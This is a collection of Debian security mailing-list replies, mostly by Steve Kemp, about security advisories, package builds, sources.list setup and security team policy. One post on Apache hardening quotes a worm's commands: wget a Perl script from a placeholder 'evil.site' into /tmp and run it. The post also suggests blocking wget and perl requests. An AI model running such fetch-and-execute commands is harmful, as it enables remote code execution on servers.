On Thu Jan 17, 2008 at 16:35:47 +0100, Philipp Kern wrote: Still that breaks because os is not imported. Please fix. Quickly. Done. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1448-1] New eggdrop packages fix execution of arbitrary code
On Sat Jan 05, 2008 at 15:11:22 +, Steve Kemp wrote: - Debian Security Advisory DSA-1448-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp January 05, 2008 http://www.debian.org/security/faq - Apologies for sending this mail out twice. Steve -- pgpaHHCCiWhkf.pgp Description: PGP signature
Re: ping22: can not kill this process
On Fri Jan 04, 2008 at 06:04:50 -0200, Felipe Figueiredo wrote: Anybody has a clue as to why was this default choosen, and not the safest one? Too many broken PHP applications? Anyway please see /usr/share/doc/php4-common/examples/ for different examples. (Or /usr/share/doc/php5-common/examples). Steve -- http://www.steve.org.uk/ pgpiQG2VvWmON.pgp Description: PGP signature
Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution
On Fri Dec 07, 2007 at 09:46:21 -0500, Juan Gallego wrote: | For the stable distribution (etch), this problem has been fixed in version | 1.39+1.40-WIP-2006.11.14+dfsg-2etch1. | For the unstable distribution (sid), this problem will be fixed shortly. is sarge affected by this vulnerability? or has sarge been archived and i missed the announcement? Sarge is affected, but I don't yet have a working patch for that. There should be an update shortly, but this is pretty low-risk and it seemed sensible to release now, rather than waiting. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution
On Fri Dec 07, 2007 at 18:41:35 +0100, Nico Golde wrote: What about those, are they unimportant? They are still present in the etch code. I stumbled upon them while preparing a testing-security upload. Uknown. I used the patch provided by Theodore Tso, which he is/was planning on using for Sid/Ubuntu. If there are missing bits then we'll need to reissue the update, but right now I believed the patch was as complete as it needed to be. Sorry, this mail was originally only addressed to Steve but since I also got this mail through the debian-security list it ended up here now :) Fair enough. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: UNS: Re: [SECURITY] [DSA 1409-2] New samba packages fix several vulnerabilities
On Tue Nov 27, 2007 at 12:00:05 +1300, Ewen McNeill wrote: In message [EMAIL PROTECTED], Steve Kemp writes: Package: samba Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-4572, CVE-2007-5398 [...] For the stable distribution (etch), these problems have been fixed in version 3.0.24-6etch7. There doesn't appear to be a i386 package for Samba version 3.0.24-6etch7 on any of the security.debian.org servers. Only a 3.0.24-6etch6 package. AMD64 and most other architectures seem to have 3.0.24-6etch7 and not 3.0.24-6etch6 packages. According to the change log this means that one regression is missing in the i386 packages (6etch6): That is correct. I've build a package now, and will be uploading shortly. In the meantime you can find it here: http://people.debian.org/~skx/samba/ I'm not entirely sure whether this fixes all known regressions there seem to be mixed reports, but it is the best we have and the most current elsewhere. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Firewall with woody
On Wed Oct 17, 2007 at 11:05:58 -0300, Jorge Escudero wrote: I have the Firewall with woody and I never had got any security problem. Is it risky to still using this version? Yes. There have been no security updates released for Woody in over a year, and that means there are liable to be security-relevant bugs present in your host(s). Do I have to upgrade the version any time a new one is release? You don't need to. We can't force you. But you should strongly consider the benefits of running a stable supported version of Debian which receives security fixes. Steve -- # Commercial Debian GNU/Linux Support http://www.linux-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1379-1] New quagga packages fix denial of service
On Thu Oct 04, 2007 at 09:49:27 +0200, Etienne Favey wrote: In what respect is the quagga problem related to the openssl problem, that it gets the same DSA ID number? It was a mistake, the number was reused by accident. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 18:01:10 +0300, Riku Valli wrote: For the stable distribution (etch), this problem has been fixed in version 4:3.5.5a.dfsg.1-6etch1. It seems at kdebase and fetchmailconf depencies are broken. I don't see what the source of this is. kdebase: Depends: kappfinder (= 4:3.5.5a.dfsg.1-6etch1) but 4:3.5.5a.dfsg.1-6 is installed. kappfinder is a binary coming from the kdebase package. Depends: kate (= 4:3.5.5a.dfsg.1-6etch1) but 4:3.5.5a.dfsg.1-6 is in stalled. ditto. Unless I'm being dense the kdebase package provides all the correct versions to satisfy itself: eg. kappfinder_3.5.5a.dfsg.1-6etch1_amd64.deb kate_3.5.5a.dfsg.1-6etch1_amd64.deb (Same thing for fetchmail/fetchmailconf.) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 16:48:34 +0100, Adam D. Barratt wrote: I'm guessing the people reporting problems are i386 users. Yeah, that seems to be the problem. Thanks for being explicit about it though :) kdebase is arch:all and therefore installable on i386. kappfinder isn't and there aren't any i386 binary packages for it available. Noah has kindly volunteered to build complete packages for i386, so I'd expect this situation to be resolved in the next few hours. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 11:45:37 -0400, Noah Meyerhans wrote: Check i386. The security archive does not seem to have a complete set of i386 binary packages... Stupid buildds .. I'll find a spare i386 machine and build for that over the weekend all being well. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 19:18:38 +0300, Riku Valli wrote: fetchmailconf have similar problem too. That should be fixed now. I'm just going to send out the mail ... Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: security.d.o packages for etch built on sarge
On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote: On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote: It looks like etch's security updates were built on sarge. python2.3 isn't available in etch making ekg's security update uninstallable. I would be _very_ happy to hear _any_ comment on that. I'll probably ask debian-devel if I won't get any answer in next few days. Etch security updates *should* be built upon Etch. Sarge updates *should* be built upon Sarge. Anything else is liable to break and is a bug which should be fixed with an update. I've checked the build-logs I've got access to (all except i386) and they seem fine. is it just i386 you see this behavior upon? Do other people see this too, or is it a potentially broken system you're installing upon (I have to ask; some people still have mixed sources.lists files..) Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: an issue with recent security advisories
On Mon Jun 18, 2007 at 19:49:28 +1000, Tomasz Ciolek wrote: been uploaded to the repositories and added to Releases and Packages files? Yes. Whats the point of making a security advisory if the packages are NOT AVAILABLE in mirrors and repositories here is my sources.list... maybe I have some misconfiguraion ? You're missing: deb http://security.debian.org/ etch/updates main contrib non-free We suggest people never mirror the security archive, to avoid problems, and this is the place where security updates will be uploaded to. The sources lists you have would only receive new updates for point releases of Etch. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1266-1] New gnupg packages fix signature forgery
On Wed, Mar 14, 2007 at 11:43:40AM +0100, Frank Küster wrote: Moritz Muehlenhoff [EMAIL PROTECTED] wrote: For the upcoming stable distribution (etch) these problems have been fixed in version 1.4.6-2. However, etch still has 1.4.6-1, and no freeze exception has been requested. But it has been granted. $ grep-excuses gnupg gnupg (1.4.6-1 to 1.4.6-2) Maintainer: James Troup Too young, only 1 of 5 days old Ignoring request to block package by freeze, due to unblock request by he Not considered $ We don't expect maintainers to request unblocks for RC bugfixes (in fact, I prefer they don't, it's just extra mail to reply to). I'm not sure about the policy for security updates in etch, but it doesn't seem proper to announce the availability in a DSA if it's not yet true... Hopefully, the fact that the security team made this statement means they were aware 1.4.6-2 was a candidate for inclusion in etch. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bug#401969: please build using hunspell
On Fri, Dec 08, 2006 at 10:32:50PM +0100, Mike Hommey wrote: How does the security team feel about having to rebuild iceape, iceweasel, icedove (you forgot to file a bug on icedove), OOo and enchant if there happens to be a security bug in hunspell ? In general having multiple packages needing a rebuild for a single security fix is a problem, and not something we'd like to have to deal with. (For a specific example think of the pdf/gs updates we had to make earlier in the year/last year. Lots of different programs with very similar code which didn't always get spotted at the same time.) A more recent example would be the links + elinks updates. Links was updated first then we updated elinks afterwards when we learnt there was shared code .. (Obvious in retrospect, but if there are a lot of packages which would require a rebuild keeping track of all of them can be difficult; especially if we don't know about it in advance.) Steve -- signature.asc Description: Digital signature
Re: Mass update deployment strategy
On Mon, Nov 27, 2006 at 08:37:42PM +0100, mario wrote: i am responsible for 10 (ubuntu and debian) installations so far. I have installed apticron which informs me about updates frequently. Actually, its that often that i sometimes need to invest 1h a day just doing updates. Given the choice I'd much prefer identical distributions, even with a little pain. Since things differ between Ubuntu Debian (and Redhat/SuSE/etc). Having two or more security update schedules and two lots of testing is more painful. Do you have a strategy or anything to automate this task a little more? cfengine. I'm interested in puppet, but it wasn't (isn't yet?) stable at the time I started automation on a decent sized farm. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ signature.asc Description: Digital signature
Re: [TGSysadmin] [SECURITY] [DSA 1155-1] New sendmail packages fix denial of service
On Thu, Aug 24, 2006 at 09:17:06AM -0400, Paul Nesbit wrote: On Thu, Aug 24, 2006 at 08:23:59AM +0200, Martin Schulze [EMAIL PROTECTED] wrote: [...] a MIME conversion routine in sendmail, a powerful, efficient, and scalable mail transport agent, could be tricked [...] Funny, bias in errata reports. All DSA notices have a description like that. These descriptions come from the package itself. eg: [EMAIL PROTECTED]:~$ apt-cache show sendmail | grep Desc Description: powerful, efficient, and scalable Mail Transport Agent Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/
Re: editing new known_hosts files
On Sat, Jul 22, 2006 at 11:48:00PM +0200, LeVA wrote: I have reinstalled a server of mine, and now I need to remove it's old pubkey from my $HOME/.ssh/known_hosts, but it is in the new format, so no hostnames which may indicate which pubkey belongs to which host. How can I decrypt the known_hosts file? You can't decrypt them, but you can delete all entries for a given host with: ssh-keygen -R host.name See the manpage for ssh-keygen for details. (Search for hash to see the relevent options.) Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: BADSIG verifying s.d.o Release file
On Fri, Jun 30, 2006 at 09:15:42AM +0200, martin f krafft wrote: I've been seeing this a bunch in the past few weeks. Just making sure you know about it, and maybe someone knows what's going on: W: GPG error: http://security.debian.org stable/updates Release: The following signatures were invalid: BADSIG 010908312D230C5F Debian Archive Automatic Signing Key (2006) [EMAIL PROTECTED] This is a known issue, relating to some of the infrastructure changes. Hopefully it will be resolved shortly. Currently each of the release files are empty... Steve -- signature.asc Description: Digital signature
Re: BADSIG verifying s.d.o Release file
On Fri, Jun 30, 2006 at 10:33:55AM +0200, martin f krafft wrote: also sprach Steve Kemp [EMAIL PROTECTED] [2006.06.30.1004 +0200]: This is a known issue, relating to some of the infrastructure changes. Hopefully it will be resolved shortly. Thanks Steve. Do you know why this was not publicised beforehand on debian-security-announce or debian-announce? I think nobody thought of it to be honest, and people started to notice just around the time we did. (The problem here comes from the new dak software being used to handle the archive, and this is just a problem that hadn't been spotted since we've only just started releasing advisories with it.) Steve -- signature.asc Description: Digital signature
Re: Command history log for audit trail
On Thu, Jun 15, 2006 at 01:08:37PM -0700, [EMAIL PROTECTED] wrote: I need to set up an audit trail for all commands run on machines. I know that the auth.log records who logs in and when, and that each user's .bash_history has a history of their commands. But is there some other way to create a log for all commands run on a system? Use the 'snoopy' package, as described here: http://www.debian-administration.org/articles/88 Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Debian Kernel security status?
On Thu, Apr 20, 2006 at 04:18:28PM +0200, Jan Luehr wrote: Btw. Why do a lot of DSAs care about oldstable, while kernel-updates avoid woody? Because building kernels is hard for Sarge and very hard for Woody. I seem to recall Joey asking for volunteers to help work on kernels a good few months back ... DSAs for woody will probably cease soon as well. From memory we promised a year of support after the release of Sarge. Sarge was released early June, so that gives us the end of this month and then just May to continue with. Of course if it isn't too hard, or there is a lot of demand, it may be possible to continue supporting it for a little longer. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit signature.asc Description: Digital signature
Re: security issues with apache!
On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote: If you have to leave some writable folders for Apache user, say, /tmp, moving /tmp to another partition/filesystem and mounting it with noexec option would prevent most harm /any/ PHP script can cause. Not true. Several of the receent exploit worms do the equivilent of this: cd /tmp wget http://evil.site/perl/script.pl perl /tmp/script.pl Even if the /tmp partition is mounted noexec this will still work. (Although '/tmp/script.pl ' would fail.) Noexec can help in some situations, but blocking 'wget', 'perl' etc in requests via mod_security is a much more useful thing to do. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Another problem with gnupg
On Fri, Mar 10, 2006 at 09:42:00AM -0600, Michael Knoop wrote: There is a new problem with the gnupg program and digital signatures. http://lists.gnupg.org/pipermail/gnupg-announce/2006q1/000216.html The original problem was fixed with DSA-978. This new, related, problem will be fixed shortly - new packages are already in the queue. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [gna-private] [SECURITY] [DSA 987-1] New tar packages fix arbitrary code execution
On Wed, Mar 08, 2006 at 09:41:39AM +0100, Mathieu Roy wrote: Package: tar Vulnerability : buffer overflow Problem-Type : local(remote) What does mean local(remote) Does it means local... or remote? Local. But remote in the sense that you may receive a .tar file from a remote source. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: first A record of security.debian.org extremely slow
On Thu, Mar 02, 2006 at 10:36:16PM +0100, Marc Haber wrote: How would you implement the automatism to trigger the update on the incoming e-mail? procmail, matching on new mails to the debian-security-announce mailing list .. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: CVE-2006-0225, scponly shell command possible
On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote: This bug has been closed for unstable (see bug 350964) with the 4.6 upload, but will it be fixed for sarge? Please see DSA-969-1 released two days ago: http://www.us.debian.org/security/2006/dsa-969 Sarge is fixed. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Removing email addresses from gpg-key?
On Tue, Jan 24, 2006 at 01:54:24PM +, Jonathan McDowell wrote: You want to revoke the uids (revuid) rather than deleting them; there's no way you can delete them off other people's keyrings, or the keyservers, so you mark them as deleted instead by revoking them. Thanks for that. Obvious once you said it too! I've revoked the obsolete email addresses and uploaded again now. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 945-1] New antiword packages fix insecure temporary file creation
On Tue, Jan 17, 2006 at 07:59:45PM +0100, Florian Weimer wrote: AFAICS, this rule is quite reasonable, so I assume that this antiword version is just a minor glitch. Correct? Yes. My fault entirely. It actually took me a while to see what was wrong there - usually I just add 'sargeN' to the string, but for some reason I've updated the minor too. Definitely something I'll be careful to avoid in the future. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 930-1] New smstools packages fix format string vulnerability
On Mon, Jan 09, 2006 at 02:32:18PM +0100, Thijs Kinkhorst wrote: For the unstable distribution the package will be updated shortly. It's great to hear that unstable will be fixed soon, but why wasn't there a grave bug filed against the package? If for some reason the maintainer misses this DSA, it is lateron unknown that the version in unstable is vulnerable and still needs to be fixed... A bug has been filed. If there is no action in a short space of time I'm happy to perform an NMU. Testing will get the fix shortly via the package migration, so it is only sid users who are at risk; and we don't offer explicit security support there. (Though obviously it should be fixed ASAP.) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: hardening checkpoints
Le Mardi, 20 Décembre 2005 16.18, Michelle Konzack a écrit : But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System with my prefered Desktop. In all Internet Cafes i get an IP via DHCP. Wrong. I was in Milano (Italy) a few month ago, and I wanted to do exactly that. The person at the desk looked at me as if I were a Martien when I ask her if I could reboot the machine on my personnel Debian live-cd. First, she didn't understand what all that was about, and second she could'nt control my connection time, so she simply refused. Moreover, in Italy you have to give an ID (they do a photocopy of it; she couldn't tell me how long they keep it..) to be able to use a computer in an Internet Café (terrorism you know...). Sorry ;-) Greetings Michelle Have a nice day -- steve jabber : [EMAIL PROTECTED]
Re: hardening checkpoints
Le Mercredi, 21 Décembre 2005 12.40, Johannes Wiedersich a écrit : steve wrote: Le Mardi, 20 Décembre 2005 16.18, Michelle Konzack a écrit : But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System with my prefered Desktop. In all Internet Cafes i get an IP via DHCP. Wrong. I was in Milano (Italy) a few month ago, and I wanted to do exactly that. The person at the desk looked at me as if I were a Martien when I ask her if I could reboot the machine on my personnel Debian live-cd. First, she didn't understand what all that was about, and second she could'nt control my connection time, so she simply refused. Moreover, in Italy you have to give an ID (they do a photocopy of it; she couldn't tell me how long they keep it..) to be able to use a computer in an Internet Café (terrorism you know...). Sorry ;-) Wrong: in Europe you shouldn't mix Italy with France. right : you eat better in France than in Italy. No, being serious again, I read Michelle's post a bit to fast and I mixed things up. I don't know why, but I thought she was thinking of Europe in her post. I don't know anything about Italian or French internet cafes, but I would be really surprised, if there would be anything similar in the way their administration works. You're right, they don't, politics is now the difference, at least in Internet Cafés. For Italy, no matter what you do or where you are, it is always a sure bet, that the person behind the counter (hotel, airport, etc. etc. internet cafe) won't allow anything 'unusual' without double and tripple checking with his/her boss. .. who is rarely there. So Michelle's solution seems to be quite unrealistic. This usually means that you have to insist and wait. I'm ok with waiting 5 minutes, but more is too much, especially when you're just looking for a theather's timetable and you're in a hurry (and the theather's phone is down. Own experience.) (In Italy 'unusual' means 'slightly different from normal'). I'll let you the responsability of that definition ;-) Short message: two countries in Europe (say Italy and France) are about as different from each other than any European country is from say the US. I'm with you on that one. But living near France, I'm very much willing to go there and give it a try. Just for the sake of it. But, I don't know why, I feel that my live-cd won't be very much appreciated.. really too scary stuff, isn't it? Johannes -- steve jabber : [EMAIL PROTECTED]
Re: Restricting ssh access to internet but not to internal network
I would likely restrict access to ssh from external, if at all possible. I realize that this isn't always possible but it should be possible to at least narrow down access to certain IP ranges. For this particular problem I'm assuming there are two NICs in the computer, one with an IP in private space and the other with a public address? One idea is to bind two SSH daemons, one for each NIC. Place no AllowGroups restriction on the internal SSH daemon. This means that all users can connect internally. On the SSH daemon bound externally place the AllowGroups restriction to restrict access to members of that group. If there's only one NIC in the computer then you could still use two SSH daemons, just bind them to different ports. The internal port might be the standard tcp/22 whereas externally you would bind tcp/ or something. Then firewall off the access to port 22 from externally so that the internal-use daemon can't be accessed. Hope that helps. I'm sure others will have ideas too. Steve On Thu, Nov 24, 2005 at 10:14:11PM -0800, Patrick wrote: I have an server running sshd on Sarge. I want all users to be able to access the computer from within the internal network - but restrict access from the internet (to users in a particular group). Can this be achieved by combining the /etc/hosts.allow or /etc/hosts.deny files and the AllowGroup (or AllowUsers) options in sshd configuration file. If so, how ? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: What is a security bug?
On Wed, Nov 23, 2005 at 12:15:35PM +0100, Jasper Filon wrote: Well, obviously it is not a _security_ bug, since it has nothing to do with security. However, it is a bug, maybe even a critical one. I filed a couple of bugs on Mozilla relating to DOS attacks, crashing the browser on some badly formed input HTML. They were not treated as security bugs which suprised me at the time. Steve -- signature.asc Description: Digital signature
Re: PMASA-2005-6 when register_globals = on
On Tue, Nov 15, 2005 at 05:54:32PM +0100, Piotr Roszatycki wrote: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 reports that sarge's phpmyadmin package has a security flaw which is occured only if register_globals = on setting is used. This feature is disabled in Debian package by default so I doubt if this is serious problem. I'd like to ask if I should prepare the new package for sarge or not? I think an upload would be justified. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: What's going on with advisory for phpmyadmin?
On Fri, Oct 28, 2005 at 10:16:03AM -0500, John Goerzen wrote: On Fri, Oct 28, 2005 at 04:42:31PM +0200, Piotr Roszatycki wrote: Why my report was ignored? I've reported the problem 3 days ago and I had no reply. This seems to be a very frequent problem going on for awhile now. Could someone from the security team comment on what the problem is? The problem is that we receive a lot of reports, each of which may involve a significant amount of time to attend to. New entries are pushed onto the stack almost daily. Whilst some are simple and can be dealt with easily some are more complex and obviously we cannot disclose them publically. If it is useful I could begin sending out a form response, something like Yes we recieved your report, yes we will fix it, please have patience. However a useful response such as Yes we've got your package report and we'll update an advisory after we've done openssh, mozilla, the kernel. is not going to happen. Even estimating an advisory date is going to be non-trivial. (NOTE: Package names above are chosen at random ...) Sometimes an issue will be responded to, fixed, and uploaded all in the same day. Sometimes it takes longer to: * Confirm the problme. * Produce a patch. * Communicate with the package maintainer to discover when the Sid version will be tested. * Communicate with other Linux distributions to make sure that the package can be updated by multiple distributions in a coordinated fashion. * Communicate with the upstream developers to let them know, if they don't so far. * Allocate and assign a unique ID for the issue. The best thing that you can do when reporting problems is: a) Be detailed. b) Ideally have a patch, or a pointer to one. c) Be patient. d) Don't file reports which are already in the BTS. e) Be patient. f) Be patient. All reports are read and responded to *in time*. Be patient. None of this is news. Steve -- signature.asc Description: Digital signature
Re: What's going on with advisory for phpmyadmin?
On Fri, Oct 28, 2005 at 11:01:29AM -0500, John Goerzen wrote: Could someone from the security team comment on what the problem is? The problem is that we receive a lot of reports, each of which may involve a significant amount of time to attend to. Well, that's a symptom. Isn't the root problem not enough people on the team in this case? That is almost certainly the case, however adding more members is still not going to result in immediate updates. (Things like timezones, coordination, and other practicalities come into play with more members. Not to mention waiting for other vendors, upstream etc, is not something that will be helped by more members). Steve -- signature.asc Description: Digital signature
Re: [SECURITY] [DSA 862-1] New Ruby 1.6 packages fix safety bypass
On Tue, Oct 11, 2005 at 09:32:57AM +0200, Wolfgang Jeltsch wrote: Am Dienstag, 11. Oktober 2005 09:01 schrieb Martin Schulze: [...] Package: ruby1.8 Ruby 1.6 or Ruby 1.8? Both. See the table: http://www.us.debian.org/security/2005/dsa-860 http://www.us.debian.org/security/2005/dsa-862 Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
security.debian.org - Infrastructure updates
Hi, Just a quick note to point people at this news annoucement: http://lists.debian.org/debian-news/debian-news-2005/msg00047.html Steve -- signature.asc Description: Digital signature
Re: ClamAV vulnerability
On Mon, Sep 26, 2005 at 05:36:27AM -0700, P PRABHU wrote: Any fix for the latest ClamAV buffer overflow in the file upx.c vulnerability. Currently .deb based version is 0.84-2.sarge.2 . Is this version subject to this vulnerability ?? If so any fix will be released A DSA is pending, and should be available shortly. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: security.debian.org timeouts
On Mon, Sep 19, 2005 at 09:18:29PM +0200, No?l K?the wrote: anybody knows what's the problem with klecker/security.d.o? http://lists.debian.org/debian-curiosa/2005/09/msg00018.html There is an advisory pending ... Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Unusual incoming traffic detected from klecker.debian.org and sou rce.rfc822.org
On Wed, Sep 14, 2005 at 10:51:19AM +0200, Mathieu JANIN wrote: I was updating my system at that time, but klecker.debian.org is not in my sources (or perharps with an other name). klecker.debian.org is security.debian.org, which might explain it? Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
On Mon, Aug 29, 2005 at 11:46:24AM -0500, Branden Robinson / Debian Project Leader wrote: As far as I know, the stable/oldstable security team was never (recently) down to Joey S. alone. Mike Stone and Steve Kemp have been active members for some time (Steve was, as I understand it, promoted from secretary to full member within the past couple of months). Steve (me) still remains a secretary, rather than a full member. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
Florian Weimer wrote: * Michael Stone: Contact the security team. Describe the bug in such a way that the security team understands its severity and impact. It is not sufficient to say just trust me and issue an advisory. From what I've seen so far this is not the obvious buffer overflow sort of bug, it's a configured behavior which deviates from some documented expectation. The question, then, is how that deviation occurs, what the documented expectation is, and (most importantly for stable) is there any chance that someone might be relying on the implemented behavior rather than the documented behavior. It seems that shorewall generates an ACL that ACCEPTs all traffic once a MAC rule matches. Further rules are not considered. The explanations in version 2.2.3 seem to indicate that this was the intended behavior, but its implications surprised upstream, and a corrected version was released. IMHO, Debian should publish at least a DSA that explains this discrepancy, especially if the package maintainer also thinks that it's necessary. It seems to be fairly tricky to determine how much of a security risk a bug has to be before a fix will find its way into stable. Another example is fwbuilder which *silently* fails to overwrite its generated script at compile time if the user doesn't have write permissions on the existing script. I view this as a security problem because what if you *think* you've made changes to your firewall and are now protected only... you arn't and the firewall hasn't been updated? Is that enough of a security problem for the fix to get into stable? Who decides? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
Florian Weimer wrote: * Steve Wray: Another example is fwbuilder which *silently* fails to overwrite its generated script at compile time if the user doesn't have write permissions on the existing script. Most bugs in security tools are security bugs. We have to draw a line somewhere, otherwise stable becomes meaningless. Actually, having followed the mozilla/firefox discussion and various other thread on this list, I am inclined to believe that the concept of a stable distribution in the modern internet/open source environment is already meaningless. I view this as a security problem because what if you *think* you've made changes to your firewall and are now protected only... you arn't and the firewall hasn't been updated? Is that enough of a security problem for the fix to get into stable? The underlying problem seems to be that fwbuilder does not provide means to test a configuration after it has been applied to the system. Such tests would catch a more general class of problems, and not just some isolated file system problem. Not quite. When the fwbuilder application tries to write to the file, it fails. This exception doesn't appear to be handled by anything at all and hence the silent failure to write to the file. The issue of actually testing firewall configurations is a whole 'nother problem. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
Florian Weimer wrote: * Steve Wray: I view this as a security problem because what if you *think* you've made changes to your firewall and are now protected only... you arn't and the firewall hasn't been updated? Is that enough of a security problem for the fix to get into stable? [snip] When the fwbuilder application tries to write to the file, it fails. This exception doesn't appear to be handled by anything at all and hence the silent failure to write to the file. The issue of actually testing firewall configurations is a whole 'nother problem. But you agree that automated tests of the configuration, after it has been written and applied, would detect such a problem (if there are proper test cases, of course)? Regression testing of firewall rules would have to be the 'holy grail' of the work we do here, where there are approximately one bazillion firewalls to manage, with regular changes to production systems. It'd need some serious AI programming though and probably some sort of netfilter simulator. It shouldn't be too hard to implement in an appropriate language. Prolog or one of the 'constraint programming' languages perhaps. But this, while fascinating, is getting way off topic :) I'm NOT saying that the bug shouldn't be fixed. What I want to say that the mere occurrence of such a bug is a symptom of a larger problem in the software. If we start labeling such symptoms as security bugs, we can probably issue five DSAs a week for ordinary bugs in software which is somewhat security-related. (GnuPG crashes, and users might skip verification of a signature on an important document, putting them at risk -- is this really a security bug?) This is very true and pretty well what I'm getting at. I don't believe that there can be any hard and fast rules as to what counts as enough of a bug to count as a security bug. Its down to people making decisions. In the end, I imagine that a lot of production sites out there are *having* to move to debian 'backports'. They certainly were for woody... Now is *that* good for anyone concerned? I don't believe that 